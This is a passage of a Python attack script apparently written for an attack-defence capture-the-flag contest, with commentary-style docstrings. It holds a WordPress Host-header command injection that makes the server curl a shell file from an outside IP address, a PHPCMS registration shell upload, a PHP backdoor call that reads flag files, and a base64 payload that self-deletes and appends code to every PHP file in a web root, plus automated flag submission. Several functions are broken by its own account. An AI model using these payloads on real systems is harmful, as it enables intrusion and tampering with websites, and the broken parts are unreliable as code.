    headers['Host'] = generate_command('/bin/bash /tmp/rce')
    requests.post(target, headers=headers, data=data, allow_redirects=False)
62 |
63 |
def poc_wordpress_phpmail_shell(url):
    """Single-request variant of the Host-header injection above; incomplete as written.

    `shellpath` and `shellurl` are both empty strings, so the injected
    command is `/usr/bin/curl -o  115.159.196.171/shell.txt` (no output
    path) and the function always returns ''. The response is not inspected.
    """
    shellpath = ''
    shellurl = ''
    target = 'http://{}'.format(url)
    shell_url = '115.159.196.171/shell.txt'
    user = 'admin'
    data = {
        'user_login': user,
        'redirect_to': '',
        'wp-submit': 'Get New Password'
    }
    headers = {
        'Host': generate_command('/usr/bin/curl -o ' + shellpath + ' ' + shell_url),
        'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
    }
    target += '/wp-login.php?action=lostpassword'
    requests.post(target, headers=headers, data=data, allow_redirects=False)
    return shellurl
82 |
83 |
def poc_phpcms_reg_shell(url):
    """POST a member registration to <url>/index.php?m=member&c=index&a=register&siteid=1 and scrape an <img src=...> from the reply.

    The 'info[content]' value is broken in this copy: the string literal
    opens on one line and closes on the next, which is a SyntaxError in
    Python, so whatever markup it originally carried is not recoverable
    here. The response body is printed, then the first `<img src=(.*)>`
    match (greedy, so it runs to the last '>' on that line) is returned as
    `shell`; '' when nothing matches. The request is made without a timeout.
    """
    u = '{}/index.php?m=member&c=index&a=register&siteid=1'.format(url)
    data = {
        'siteid': '1',
        'modelid': '1',
        'username': 'test',
        'password': 'testxx',
        'email': 'test@test.com',
        'info[content]': '
',
        'dosubmit': '1',
    }
    rep = requests.post(u, data=data)
    print(rep.content)
    shell = ''
    re_result = re.findall(r'<img src=(.*)>', rep.content)
    if len(re_result):
        shell = re_result[0]
    return shell
102 |
103 |
def custom_shell_getflag(ip, evalcode=""):
    """POST PHP code as form field "s" to http://<ip>/shell.php?v=virinkshell and return the body.

    When *evalcode* is empty it defaults to echoing /home/flag. The fixed
    query key `v=virinkshell` and the form field name `s` identify this
    backdoor; both are constant strings that an access-log search or WAF
    rule can match on. Returns the raw body on HTTP 200, otherwise None.
    """
    shellurl = 'http://{}/shell.php'.format(ip)
    if not evalcode:
        evalcode = "echo file_get_contents('/home/flag');"
    data = {
        "s": evalcode
    }
    res = requests.post(shellurl + "?v=virinkshell", data=data, timeout=5)
    if res.status_code == 200:
        print res.content
        return res.content
115 |
116 |
def custom_shell_add_shell(ip, ):
    """Intended to write custom_shell_code() to /path/shell.php through the backdoor; not functional as written.

    `code` is built but never sent: the request body references `evalcode`,
    which is defined neither in this scope nor at module level, so the call
    raises NameError before requests.post() runs. The trailing comma in the
    parameter list is harmless.
    """
    shellurl = 'http://{}/shell.php'.format(ip)
    shellcode = custom_shell_code()
    code = "file_put_contents('/path/shell.php',base64_decode('{}'));".format(shellcode)
    data = {
        "s": evalcode
    }
    res = requests.post(shellurl + "?v=virinkshell", data=data, timeout=5)
    if res.status_code == 200:
        print res.content
        return res.content
128 |
129 |
def custom_shell_code():
    """Return a base64-encoded PHP payload (described here for triage; nothing is executed).

    Decoded, the literal is a PHP script that removes the time limit, ignores
    client aborts, deletes its own file with unlink(__FILE__), and then uses
    glob() starting at /var/www/html to append, to every `*.php` entry it
    finds, a snippet that echoes the contents of /path/flag between ">>>"
    and "<<<" (its recursion only follows entries that are themselves
    directories matching `*.php`).
    For incident response: the self-delete means the dropper is gone after
    one request, but its effect persists as an identical line appended to
    the end of each affected .php file under the web root, which is what to
    search for and restore from a known-good copy.
    """
    shell_code = "PD9waHAKc2V0X3RpbWVfbGltaXQoMCk7Cmlnbm9yZV91c2VyX2Fib3J0KDEpOwp1bmxpbmsoX19GSUxFX18pOwpmdW5jdGlvbiBnZXRmaWxlcygkcGF0aCl7CiAgICBmb3JlYWNoKGdsb2IoJHBhdGgpIGFzICRhZmlsZSl7CiAgICAgICAgaWYoaXNfZGlyKCRhZmlsZSkpCiAgICAgICAgICBnZXRmaWxlcygkYWZpbGUuJy8qLnBocCcpOwogICAgICAgIGVsc2UKICAgICAgICAgIGZpbGVfcHV0X2NvbnRlbnRzKCRhZmlsZSwnPD9waHAgZWNobyAiPj4+Ii5maWxlX2dldF9jb250ZW50KCIvcGF0aC9mbGFnIikuIjw8PCI7Pz4nLEZJTEVfQVBQRU5EKTsKICAgIH0KfQpnZXRmaWxlcygnL3Zhci93d3cvaHRtbCcpOwo/Pg=="
    return shell_code
133 |
134 |
def login():
    """Authenticate the shared `req` session against the scoreboard portal.

    Posts the hard-coded HZ8/123456 credentials to the portal login page
    and, on HTTP 200, prints the returned HTML. Requires the module-level
    `req` to have been set to a requests.session() beforehand.
    """
    form = dict(
        username="HZ8",
        password="123456",
        testcookie="1",
        indexPage="portal/sp/index.php",
    )
    login_url = 'http://192.168.80.1/lms/portal/sp/login.php'
    res = req.post(login_url, data=form, timeout=5)
    if res.status_code != 200:
        return
    html = res.content
    print(html)
147 |
148 |
def submit(flag, ip):
    """Post one (flag, ip) pair to SUBMIT_URL via the shared `req` session and echo the reply on HTTP 200."""
    payload = {"melee_ip": ip, "melee_flag": flag}
    response = req.post(SUBMIT_URL, data=payload, timeout=5)
    if response.status_code == 200:
        print(response.content)
157 |
158 |
if __name__ == '__main__':
    # req = requests.session()
    # login()
    #
    req = requests.session()  # rebinds the module-level req used by login()/submit()
    login()
    # Single pass over URLS; there is no outer loop, so this is not re-run
    # per round.
    for ip in URLS:
        try:
            su = 'http://{}/index.php'.format(ip)
            # poc_eval_backdoor_getflag_1 reads an undefined global `evalcode`,
            # so every iteration lands in the except branch and prints the
            # NameError; submit() is never reached as the file stands.
            flag = poc_eval_backdoor_getflag_1(su)
            print ip, flag
            submit(flag, ip)
            time.sleep(1)
        except Exception, e:
            print e
            pass
    # Indentation is not recoverable from this copy: this may sit at the
    # loop level or, as written here, after it. Either way it only delays;
    # nothing runs after the 20-minute sleep.
    time.sleep(60 * 20)
176 |
--------------------------------------------------------------------------------